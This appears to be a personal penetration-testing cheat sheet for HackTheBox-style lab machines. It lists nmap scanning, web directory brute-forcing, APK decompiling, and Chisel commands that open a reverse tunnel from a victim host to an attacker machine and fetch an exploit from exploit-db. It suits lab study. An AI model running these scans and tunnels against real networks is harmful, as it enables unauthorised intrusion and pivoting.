Tools & Cheat Sheet

Nmap

nmap -p- -T5 --min-rate=1000 10.10.10.239 -oG fkclai.nmap
nmap -p $(grep -Eo '[0-9]{1,5}/open' fkclai.nmap | cut -d '/' -f 1 | tr -s '\n' ',') -sC -sV 10.10.10.239 -o nmap-result.txt

Directory Brute Force

feroxbuster -u http:///pikatwoo.pokatmon.htb -x php
dirb http://10.10.10.239/ /usr/share/wordlists/dirb/common.txt -o dirb-239.result
ffuf -u http://10.10.11.199:8080/v1/AUTH_andrew/FUZZ -w /opt/SecLists/Discovery/Web-Content/raft-medium-words.txt -mc all -ac

APK Analysis

# Static APK Analysis
apktool d mobile-app.apk
//Check the AndroidManifest.xml
# Configure

HTTP Tunnel

Chisel

Source: https://github.com/jpillora/chisel.git
  1. 1.

    Reverse Tunneling

// Hacker Machine
// setup a reverse server and listen the port 12345
./chisel server -p 12345 --reverse
//Victim Machine
// Listen on hacker 1337, forward to dump host ip on port 8000
./chisel client [hacker IP]:12345 R:1337:[dump host ip]:8000
// Hacker Machine
http://localhost:1337/ => http://[dump host ip]:8000
  1. 2.
    TCP basic tunneling
// Chisel server 1.1.1.1
./chisel server -p 1234
// Chisel Client 2.2.2.2 port 1337
./chisel client 1.1.1.1:1234 1337:www.exploit-db.com:443
wget https://localhost:9001/raw/45782